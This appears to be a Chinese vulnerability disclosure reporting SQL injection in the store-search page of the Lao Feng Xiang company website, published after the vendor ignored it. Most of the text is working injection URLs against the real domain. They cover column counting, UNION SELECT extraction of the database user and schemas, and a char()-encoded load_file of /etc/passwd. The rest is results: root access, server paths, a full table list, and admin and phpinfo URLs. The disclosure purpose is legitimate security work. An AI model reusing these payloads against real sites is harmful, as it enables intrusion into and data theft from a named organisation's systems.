2014-02-13: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-03-30: 厂商已经主动忽略漏洞,细节向公众公开
上海老凤祥有限公司官网在查询各省门店时未过滤参数,致SQL注入。
Order by 查字段数
http://www.laofengxiang.com/stores.php?area=%BA%D3%C4%CF%') order by 10%23
http://www.laofengxiang.com/stores.php?area=%BA%D3%C4%CF%') order by 11%23
http://www.laofengxiang.com/stores.php?area=%BA%D3%C4%CF%') union select 1,2,3,4,5,6,7,8,9,10%23
http://www.laofengxiang.com/stores.php?area=%BA%D3%C4%CF%') union all select 1,2,3,`SCHEMA_NAME`,5,6,7,8,9,10 from information_schema.SCHEMATA%23
http://www.laofengxiang.com/stores.php?area=%BA%D3%C4%CF%') union select 1,2,3,user(),5,6,7,8,9,10%23
http://www.laofengxiang.com/stores.php?area=%BA%D3%C4%CF%' or AGENTS_AREA is not null) and 1=2 UNION SELECT 1,2,3,load_file(char(47,101,116,99,47,112,97,115,115,119,100)) ,5,6,7,8,9,10%23
当前库:laofengxiang当前用户:root@localhost数据库版本:5.1.61-0ubuntu0.10.10.1数据库路径:/var/lib/mysql/网站物理路径:/var/www/laofengxiang/
所有表和对应的数据库信息:
lfx_about laofengxianglfx_admin laofengxianglfx_admin_menu laofengxianglfx_admin_pru laofengxianglfx_admin_prucode laofengxianglfx_admin_prucode_group laofengxianglfx_admin_role laofengxianglfx_agents laofengxianglfx_attach_list laofengxianglfx_celebrity laofengxianglfx_config laofengxianglfx_ebook laofengxianglfx_friendlink laofengxianglfx_job laofengxianglfx_leavemsg laofengxianglfx_mail laofengxianglfx_mail_attach laofengxianglfx_mail_list laofengxianglfx_module_list laofengxianglfx_module_news_1 laofengxianglfx_module_news_1_attach laofengxianglfx_module_news_1_type laofengxianglfx_module_pic_2 laofengxianglfx_module_pic_2_attach laofengxianglfx_module_pic_2_type laofengxianglfx_module_product_3 laofengxianglfx_module_product_3_attach laofengxianglfx_module_product_3_type laofengxianglfx_module_product_5 laofengxianglfx_module_product_5_attach laofengxianglfx_module_product_5_type laofengxianglfx_module_video_4 laofengxianglfx_module_video_4_type laofengxianglfx_office laofengxianglfx_product laofengxianglfx_product_attach laofengxianglfx_product_type laofengxianglfx_settings_indexpic laofengxianglfx_solution laofengxianglfx_solution_customer laofengxianglfx_solution_expert laofengxianglfx_solution_type laofengxianglfx_solution_video laofengxianglfx_video laofengxianght_admin lfxht_admindown lfxht_channel lfxht_concerninfo lfxht_menu lfxht_news lfxht_popedom lfxht_store lfxht_user lfxht_vip lfxusers pureftpd
站点phpinfo:http://www.laofengxiang.com/phpinfo.php管理后台:http://www.laofengxiang.com/admin/login.php
过滤参数。
未能联系到厂商或者厂商积极拒绝